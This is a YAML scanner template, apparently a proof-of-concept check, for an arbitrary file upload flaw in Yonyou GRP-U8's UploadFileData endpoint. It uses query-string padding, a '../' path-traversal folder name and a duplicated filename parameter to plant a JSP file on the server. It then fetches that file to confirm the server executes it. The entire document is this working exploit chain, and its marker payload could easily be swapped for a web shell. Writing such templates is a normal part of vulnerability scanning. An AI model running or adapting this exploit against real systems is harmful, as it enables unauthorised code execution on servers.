name: yongyou-grp-u8-upload-file-data
set:
  rfilename: randomLowercase(4)
  md5str: md5(rfilename)
  rboundary: randomLowercase(8)
rules:
  - method: POST
    path: "/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename={{rfilename}}.jsp&filename=1.jpg"
    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
    body: 
      "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"myFile\";filename=\"test.jpg\"\r\n\r\n<%out.print(\"{{md5str}}\");%>\r\n------WebKitFormBoundary{{rboundary}}--"
    expression: |
      response.status == 200 && response.body.bcontains(b'<script>') && response.body.bcontains(b'parent.showSucceedMsg();')
  - method: GET
    path: "/R9iPortal/{{rfilename}}.jsp"
    expression: |
      response.status == 200  && response.body.bcontains(bytes(md5str))
detail:
  author: 666